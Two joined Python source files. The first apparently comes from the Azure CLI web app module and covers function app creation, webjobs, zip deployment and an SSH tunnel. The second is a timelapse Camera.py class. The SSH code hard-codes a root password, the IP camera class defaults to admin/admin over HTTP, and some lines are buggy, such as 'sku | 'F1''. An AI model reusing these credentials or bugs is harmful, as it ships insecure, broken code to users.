instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
import requests
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization)
res_dict = response.json()
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
raise CLIError("Zip deployment failed.")
elif res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
raise CLIError("""Deployment is taking longer than expected. Please verify
status at '{}' beforing launching the app""".format(deployment_status_url))
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False): # pylint: disable=too-many-statements
import os
client = web_client_factory(cmd.cli_ctx)
# the code to deploy is expected to be the current directory the command is running from
src_dir = os.getcwd()
# if dir is empty, show a message in dry run
do_deployment = False if os.listdir(src_dir) == [] else True
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_set_build_appSetting = False
# determine the details for app to be created from src contents
lang_details = get_lang_from_content(src_dir)
# we support E2E create and deploy for selected stacks, any other stack, set defaults for os & runtime
# and skip deployment
if lang_details['language'] is None:
do_deployment = False
sku = sku | 'F1'
os_val = OS_DEFAULT
detected_version = '-'
runtime_version = '-'
else:
# update SKU to user set value
if sku is None:
sku = lang_details.get("default_sku")
else:
sku = sku
language = lang_details.get("language")
is_skip_build = language.lower() == STATIC_RUNTIME_NAME
os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
full_sku = get_sku_name(sku)
location = set_location(cmd, sku, location)
loc_name = location.replace(" ", "").lower()
is_linux = True if os_val == 'Linux' else False
asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
# Resource group: check if default RG is set
default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
_create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
src_path = "{}".format(src_dir.replace("\\", "\\\\"))
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"version_detected": "%s",
"version_to_create": "%s"
}
""" % (name, asp, rg_str, full_sku, os_val, location, src_path,
detected_version, runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = should_create_new_asp(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=(is_linux or None))
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_app = should_create_new_app(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
logger.warning("Webapp creation complete")
_set_build_appSetting = True
else:
logger.warning("App '%s' already exists", name)
if do_deployment and not is_skip_build:
# setting the appsettings causes a app restart so we avoid if not needed
_app_settings = get_app_settings(cmd, rg_name, name)
if all(not d for d in _app_settings):
_set_build_appSetting = True
elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
_set_build_appSetting = True
else:
_set_build_appSetting = False
# update create_json to include the app_url
url = _get_url(cmd, rg_name, name)
if _set_build_appSetting:
# setting to build after deployment
logger.warning("Updating app settings to enable build after deployment")
update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
if do_deployment:
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
logger.warning("Preparing to deploy %s contents to app."
"This operation can take a while to complete ...",
'' if is_skip_build else 'and build')
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file afer deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
create_json.update({'app_url': url})
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
host_name = name
if slot is not None:
host_name += "-" + slot
tunnel_server = TunnelServer('', port, host_name, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
while s.isAlive() and t.isAlive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, slot=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
else:
create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=slot)
def create_devops_build(cmd, functionapp_name=None, organization_name=None, project_name=None,
overwrite_yaml=None, use_local_settings=None, local_git=None):
from .azure_devops_build_iteractive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name,
overwrite_yaml, use_local_settings,
local_git)
return azure_devops_build_interactive.interactive_azure_devops_build()
|
Camera.py | import datetime
import logging.config
import os
import shutil
import time
import tempfile
import numpy
import requests
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
from xml.etree import ElementTree
from collections import deque
from io import BytesIO
import threading
from threading import Thread, Event, Lock
from libs.SysUtil import SysUtil
import cv2
try:
logging.config.fileConfig("logging.ini")
logging.getLogger("paramiko").setLevel(logging.WARNING)
except:
pass
try:
# improt yaml module and assert that it has a load function
import yaml
assert yaml.load
except Exception as e:
logging.error("Couldnt import suitable yaml module, no IP camera support: {}".format(str(e)))
try:
import gphoto2cffi as gp
except Exception as e:
logging.error("Couldnt import gphoto2-cffi module, no DSLR support: {}".format(str(e)))
try:
import picamera
import picamera.array
except Exception as e:
logging.error("Couldnt import picamera module, no picamera camera support: {}".format(str(e)))
pass
USBDEVFS_RESET = 21780
def nested_lookup(key, document):
"""
nested document lookup,
works on dicts and lists
:param key: string of key to lookup
:param document: dict or list to lookup
:return: yields item
"""
if isinstance(document, list):
for d in document:
for result in nested_lookup(key, d):
yield result
if isinstance(document, dict):
for k, v in document.items():
if k == key:
yield v
elif isinstance(v, dict):
for result in nested_lookup(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in nested_lookup(key, d):
yield result
class Camera(object):
"""
Base Camera class.
:cvar int accuracy: 3: Number of seconds caputre should be accurate to.
:cvar int default_width: 1080: Default width of resized images.
:cvar int default_height: 720: Default height of resuzed images.
:cvar list file_types: ["CR2", "RAW", "NEF", "JPG", "JPEG", "PPM", "TIF", "TIFF"]: Supported output image types.
:cvar list output_types: ["tif", "jpg"]: Output image types, ignored by GPCamera.
:ivar collections.deque communication_queue: Reference to a deque, or a deque.
:ivar logging.Logger logger: Logger for each Camera.
:ivar threading.Event stopper: Stopper event object to allow thread stopping.
:ivar str identifier: Unique identifier for the camera. Used to distinguish cameras from one another.
:ivar list failed: List of failed capture timepoints.
:ivar str config_filename: Confuguration file path, unused if camera is instantiated with the noconf init parameter.
:ivar configparser.ConfigParser config: Configuration object.
:ivar str camera_name: Human friendly name of the camera.
:ivar int interval: Capture interval (in seconds).
:ivar str spool_directory: Path to stream images into during the capture process.
:ivar str upload_directory: Path to move images to after the captre process.
:ivar datetime.time begin_capture: Naive start time for capture.
:ivar datetime.time end_capture: Naive end time for capture.
:ivar datetime.datetime current_capture_time: When the capture process began.
"""
accuracy = 3
default_width, default_height = 1080, 720
file_types = ["CR2", "RAW", "NEF", "JPG", "JPEG", "PPM", "TIF", "TIFF"]
output_types = ["tif", 'jpg']
_frame = None
_thread = None
_last_access = None
def init_stream(self):
"""
Initialises a video stream class thread.
"""
if self.__class__._thread is None:
# start background frame thread
self.__class__._thread = threading.Thread(target=self.stream_thread)
self.__class__._thread.start()
# wait until frames start to be available
while self.__class__._frame is None:
time.sleep(0.01)
def get_frame(self) -> bytes:
"""
Gets a frame from the a running :func:`stream_thread`.
:return: encoded image data as bytes.
"""
self.__class__._last_access = time.time()
self.init_stream()
return self.__class__._frame
@classmethod
def stream_thread(cls):
"""
Boilerplate stream thread.
Override this with the correct method of opening the camera, grabbing image data and closing the camera.
"""
print("Unimplemented classmethod call: stream_thread")
print("You should not create a Camera object directly")
def get_camera():
pass
with get_camera() as camera:
# let camera warm up
while True:
# example, you actually need to get the data from somewhere.
cls._frame = camera.get_frame().read()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls._last_access > 10:
break
cls._thread = None
def __init__(self, identifier: str = None, queue: deque = None, noconf: bool = False, **kwargs):
"""
Initialiser for cameras...
:param identifier: unique identified for this camera, MANDATORY
:param queue: deque to push info into
:param noconf: dont create a config, or watch anything. Used for temporarily streaming from a camera
:param kwargs:
"""
if queue is None:
queue = deque(tuple(), 256)
self.communication_queue = queue
self.logger = logging.getLogger(identifier)
self.stopper = Event()
self.identifier = identifier
self.camera_name = identifier
self.failed = list()
self._exif = dict()
self.focus_position = None
self._frame = None
self._image = numpy.empty((Camera.default_width, Camera.default_height, 3), numpy.uint8)
if not noconf:
self.config_filename = SysUtil.identifier_to_ini(self.identifier)
self.config = \
self.camera_name = \
self.interval = \
self.upload_directory = \
self.begin_capture = \
self.end_capture = \
self.begin_capture = \
self.end_capture = \
self.current_capture_time = None
self.re_init()
def re_init(self):
"""
Re-initialisation method for updating configuration values.
The signature for this method is provided to :func:`libs.SysUtil.SysUtil.add_watch`, which calls it
when the config file has been modified.
This method should load all the configuration values from the config file into the Camera object.
"""
self.logger.info("Re-init...")
self.config = SysUtil.ensure_config(self.identifier)
self.camera_name = self.config["camera"]["name"]
self.interval = self.config.getint("timelapse", "interval")
self.upload_directory = self.config["localfiles"]["upload_dir"]
self.begin_capture = datetime.time(0, 0)
self.end_capture = datetime.time(23, 59)
start_time_string = str(self.config['timelapse']['starttime'])
start_time_string = start_time_string.replace(":", "")
end_time_string = str(self.config['timelapse']['stoptime'])
end_time_string = end_time_string.replace(":", "")
try:
start_time_string = start_time_string[:4]
assert end_time_string.isdigit(), "Non numerical start time, {}".format(str(end_time_string))
self.begin_capture = datetime.datetime.strptime(start_time_string, "%H%M").time()
except Exception as e:
self.logger.error("Time conversion error starttime - {}".format_map(str(e)))
try:
# cut string to max of 4.
end_time_string = end_time_string[:4]
assert end_time_string.isdigit(), "Non numerical end time, {}".format(str(end_time_string))
self.end_capture = datetime.datetime.strptime(end_time_string, "%H%M").time()
except Exception as e:
self.logger.error("Time conversion error stoptime - {}".format(str(e)))
try:
if not os.path.exists(self.upload_directory):
self.logger.info("Creating upload dir {}".format(self.upload_directory))
os.makedirs(self.upload_directory)
except Exception as e:
self.logger.error("Creating directories {}".format(str(e)))
self._exif = self.get_exif_fields()
self.current_capture_time = datetime.datetime.now()
def capture_image(self, filename: str = None) -> numpy.array:
"""
Camera capture method.
override this method when creating a new type of camera.
Behavior:
- if filename is a string, write images to disk as filename.ext, and return the names of the images written sucessfully.
- if filename is None, it will set the instance attribute `_image` to a numpy array of the image and return that.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
return self._image
def capture(self, filename: str = None) -> numpy.array:
"""
capture method, only extends functionality of :func:`Camera.capture` so that testing with can happen
Camera.capture = Camera.capture_monkey
For extending the Camera class override the Camera.capture_image method, not this one.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
if filename:
dirname = os.path.dirname(filename)
os.makedirs(dirname, exist_ok=True)
return self.capture_image(filename=filename)
def capture_monkey(self, filename: str = None) -> numpy.array:
"""
Simulates things going horribly wrong with the capture.
Will sometimes return None, an empty list or an invalid filename.
Sometimes will raise a generic Exception.
The rest of the time it will capture a valid image.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
self.logger.warning("Capturing with a naughty monkey.")
import random
s = random.uniform(0, 100)
if s < 10:
# return nothing
return None
elif 10 <= s <= 20:
# return empty list
return []
elif 20 <= s <= 30:
# return an invalid list of no files
return ["Ooh ooh, ahh ahhh!"]
elif 30 <= s <= 40:
# raise an uncaught exception
raise Exception("BANANAS")
elif 40 <= s <= 50:
# return some random bytes
return bytes(b'4')
elif 50 <= s <= 60:
# return a string
return "Feed me!"
else:
return self.capture_image(filename=filename)
@property
def exif(self) -> dict:
"""
Gets the current exif data, sets the exif datetime field to now.
:return: dictionary of exif fields and their values.
:rtype: dict
"""
self._exif["Exif.Photo.DateTimeOriginal"] = datetime.datetime.now()
return self._exif
@property
def image(self) -> numpy.array:
"""
Gets the current image (last image taken and stored) as a numpy.array.
:return: numpy array of the currently stored image.
:rtype: numpy.array
"""
return self._image
@staticmethod
def timestamp(tn: datetime.datetime) -> str:
"""
Creates a properly formatted timestamp from a datetime object.
:param tn: datetime to format to timestream timestamp string
:return: formatted timestamp.
"""
return tn.strftime('%Y_%m_%d_%H_%M_%S')
@staticmethod
def time2seconds(t: datetime.datetime) -> int:
"""
Converts a datetime to an integer of seconds since epoch
:return: integer of seconds since 1970-01-01
:rtype: int
"""
try:
return int(t.timestamp())
except:
# the 'timestamp()' method is only implemented in python3.3`
# this is an old compatibility thing
return int(t.hour * 60 * 60 + t.minute * 60 + t.second)
@property
def timestamped_imagename(self) -> str:
"""
Builds a timestamped image basename without extension from :func:`Camera.current_capture_time`
:return: image basename
:rtype: str
"""
return '{camera_name}_{timestamp}'.format(camera_name=self.camera_name,
timestamp=Camera.timestamp(self.current_capture_time))
@property
def time_to_capture(self) -> bool:
"""
Filters out times for capture.
returns True by default.
returns False if the conditions where the camera should capture are NOT met.
:return: whether or not it is time to capture
:rtype: bool
"""
current_naive_time = self.current_capture_time.time()
if not self.config.getboolean("camera", "enabled"):
# if the camera is disabled, never take photos
return False
if self.begin_capture < self.end_capture:
# where the start capture time is less than the end capture time
if not self.begin_capture <= current_naive_time <= self.end_capture:
return False
else:
# where the start capture time is greater than the end capture time
# i.e. capturing across midnight.
if self.end_capture <= current_naive_time <= self.begin_capture:
return False
# capture interval
if not (self.time2seconds(self.current_capture_time) % self.interval < Camera.accuracy):
return False
return True
def get_exif_fields(self) -> dict:
"""
Get default fields for exif dict, this should be overriden and super-ed if you want to add custom exif tags.
:return: exif fields
:rtype: dict
"""
exif = dict()
exif['Exif.Image.Make'] = "Make"
exif['Exif.Image.Model'] = "Model"
exif['Exif.Image.CameraSerialNumber'] = self.identifier
return exif
def encode_write_np_array(self, np_image_array: numpy.array, fn: str) -> list:
"""
takes a RGB numpy image array like the ones from cv2 and writes it to disk as a tif and jpg
converts from rgb to bgr for cv2 so that the images save correctly
also tries to add exif data to the images
:param numpy.array np_image_array: 3 dimensional image array, x,y,rgb
:param str fn: filename
:return: files successfully written.
:rtype: list(str)
"""
# output types must be valid!
fnp = os.path.splitext(fn)[0]
successes = list()
for ext in Camera.output_types:
fn = "{}.{}".format(fnp, ext)
s = cv2.imwrite(fn, np_image_array)
if s:
successes.append(fn)
try:
# set exif data
import pyexiv2
meta = pyexiv2.ImageMetadata(fn)
meta.read()
for k, v in self.exif.items():
try:
meta[k] = v
except:
pass
meta.write()
except Exception as e:
self.logger.debug("Couldnt write the appropriate metadata: {}".format(str(e)))
return successes
@staticmethod
def _write_raw_bytes(image_bytesio: BytesIO, fn: str) -> list:
"""
Writes a BytesIO object to disk.
:param image_bytesio: bytesio of an image.
:param fn:
:return: file name
"""
with open(fn, 'wb') as f:
f.write(image_bytesio.read())
# no exif data when writing the purest bytes :-P
return fn
def stop(self):
"""
Stops the capture thread, if self is an instance of :class:`threading.Thread`.
"""
self.stopper.set()
def focus(self):
"""
AutoFocus trigger method.
Unimplemented.
"""
pass
def communicate_with_updater(self):
"""
Inter-thread communication method.
Communicates with this objects :class:`libs.Updater.Updater` by keeping a reference to its member
'communication_queue' and appending this objects current state to the queue.
"""
try:
data = dict(
name=self.camera_name,
identifier=self.identifier,
failed=self.failed,
last_capture=int(self.current_capture_time.strftime("%s")))
# append our data dict to the communication_queue deque.
self.communication_queue.append(data)
self.failed = list()
except Exception as e:
self.logger.error("Inter-thread communication error: {}".format(str(e)))
def run(self):
"""
Main method. continuously captures and stores images.
"""
while True and not self.stopper.is_set():
self.current_capture_time = datetime.datetime.now()
# checking if enabled and other stuff
if self.__class__._thread is not None:
self.logger.critical("Camera live view thread is not closed, camera lock cannot be acquired.")
continue
if self.time_to_capture:
try:
start_capture_time = time.time()
raw_image = self.timestamped_imagename
self.logger.info("Capturing for {}".format(self.identifier))
with tempfile.TemporaryDirectory(prefix=self.camera_name) as spool:
files = self.capture(filename=os.path.join(spool, raw_image))
# capture. if capture didnt happen dont continue with the rest.
if len(files) == 0:
self.failed.append(self.current_capture_time)
continue
if self.config.getboolean("ftp", "replace"):
st = time.time()
resize_t = 0.0
if self.config.getboolean("ftp", "resize"):
self._image = cv2.resize(self._image, (Camera.default_width, Camera.default_height),
interpolation=cv2.INTER_NEAREST)
resize_t = time.time() - st
cv2.putText(self._image,
self.timestamped_imagename,
org=(20, self._image.shape[0] - 20),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=1,
color=(0, 0, 255),
thickness=2,
lineType=cv2.LINE_AA)
cv2.imwrite(os.path.join("/dev/shm", self.identifier + ".jpg"), self._image)
shutil.copy(os.path.join("/dev/shm", self.identifier + ".jpg"),
os.path.join(self.upload_directory, "last_image.jpg"))
self.logger.info("Resize {0:.3f}s, total: {0:.3f}s".format(resize_t, time.time() - st))
# copying/renaming for files
oldfiles = files[:]
files = []
for fn in oldfiles:
if type(fn) is list:
files.extend(fn)
else:
files.append(fn)
for fn in files:
# move files to the upload directory
try:
if self.config.getboolean("ftp", "timestamped"):
shutil.move(fn, self.upload_directory)
self.logger.info("Captured & stored for upload - {}".format(os.path.basename(fn)))
except Exception as e:
self.logger.error("Couldn't move for timestamped: {}".format(str(e)))
# remove the spooled files that remain
try:
if os.path.isfile(fn):
self.logger.info("File remaining in spool directory, removing: {}".format(fn))
os.remove(fn)
except Exception as e:
self.logger.error("Couldn't remove spooled when it still exists: {}".format(str(e)))
# log total capture time
self.logger.info("Total capture time: {0:.2f}s".format(time.time() - start_capture_time))
# communicate our success with the updater
self.communicate_with_updater()
# sleep for a little bit so we dont try and capture again so soon.
time.sleep(Camera.accuracy * 2)
except Exception as e:
self.logger.critical("Image Capture error - {}".format(str(e)))
time.sleep(0.1)
class IPCamera(Camera):
"""
IPCamera, unfinished and untested.
TODO: needs work to support both yml config and normal configs
"""
def __init__(self, identifier=None, ip=None, config=None, queue=None, **kwargs):
if not config:
config = dict()
self.config = config.copy()
self.communication_queue = queue or deque(tuple(), 256)
self.return_parser = config.get("return_parser", "plaintext")
self.logger = logging.getLogger(identifier)
self.stopper = Event()
self.identifier = identifier
self.camera_name = config.get("camera_name", identifier)
self.interval = int(config.get("interval", 300))
self.upload_directory = config.get("upload_dir", os.path.join(os.getcwd(), identifier))
self.begin_capture = datetime.time(0, 0)
self.end_capture = datetime.time(23, 59)
start_time_string = str(self.config.get('starttime', "00:00"))
start_time_string = start_time_string.replace(":", "")
end_time_string = str(self.config.get('stoptime', "23:59"))
end_time_string = end_time_string.replace(":", "")
try:
start_time_string = start_time_string[:4]
assert end_time_string.isdigit(), "Non numerical start time, {}".format(str(end_time_string))
self.begin_capture = datetime.datetime.strptime(start_time_string, "%H%M").time()
except Exception as e:
self.logger.error("Time conversion error starttime - {}".format_map(str(e)))
try:
# cut string to max of 4.
end_time_string = end_time_string[:4]
assert end_time_string.isdigit(), "Non numerical end time, {}".format(str(end_time_string))
self.end_capture = datetime.datetime.strptime(end_time_string, "%H%M").time()
except Exception as e:
self.logger.error("Time conversion error stoptime - {}".format(str(e)))
self.failed = list()
self._image = numpy.empty((Camera.default_width, Camera.default_height, 3), numpy.uint8)
try:
if not os.path.exists(self.upload_directory):
self.logger.info("Creating upload dir {}".format(self.upload_directory))
os.makedirs(self.upload_directory)
except Exception as e:
self.logger.error("Creating directories {}".format(str(e)))
self._exif = self.get_exif_fields()
self.current_capture_time = datetime.datetime.now()
self._image = None
self._notified = []
format_str = config.get("format_url", "http://{HTTP_login}@{ip}{command}")
self.auth_type = config.get("auth_type", "basic")
self.auth_object = None
if format_str.startswith("http://{HTTP_login}@"):
format_str = format_str.replace("{HTTP_login}@", "")
self.auth_object = HTTPBasicAuth(config.get("username", "admin"),
config.get("password", "admin"))
self.auth_object_digest = HTTPDigestAuth(config.get("username", "admin"),
config.get("password", "admin"))
self.auth_object = self.auth_object_digest if self.auth_type == "digest" else self.auth_object
self._HTTP_login = config.get("HTTP_login", "{user}:{password}").format(
user=config.get("username", "admin"),
password=config.get("password", "admin"))
self._url = format_str.format(
ip=ip or config.get("ip", "192.168.1.7"),
HTTP_login=self._HTTP_login,
command="{command}")
self._image_size_list = config.get("image_size_list", [[1920, 1080], [1280, 720], [640, 480]])
self._image_size = config.get("image_size", self._image_size_list[0])
image_quality = config.get("image_quality", 100)
self._image_quality = image_quality
# no autofocus modes by default.
self._autofocus_modes = config.get("autofocus_modes", [])
self._hfov_list = config.get("horizontal_fov_list",
[71.664, 58.269, 47.670, 40.981, 33.177, 25.246, 18.126, 12.782, 9.217, 7.050,
5.82])
self._vfov_list = config.get("vertical_fov_list",
[39.469, 33.601, 26.508, 22.227, 16.750, 13.002, 10.324, 7.7136, 4.787, 3.729,
2.448])
self._hfov = self._vfov = None
self._zoom_list = config.get("zoom_list", [50, 150, 250, 350, 450, 550, 650, 750, 850, 950, 1000])
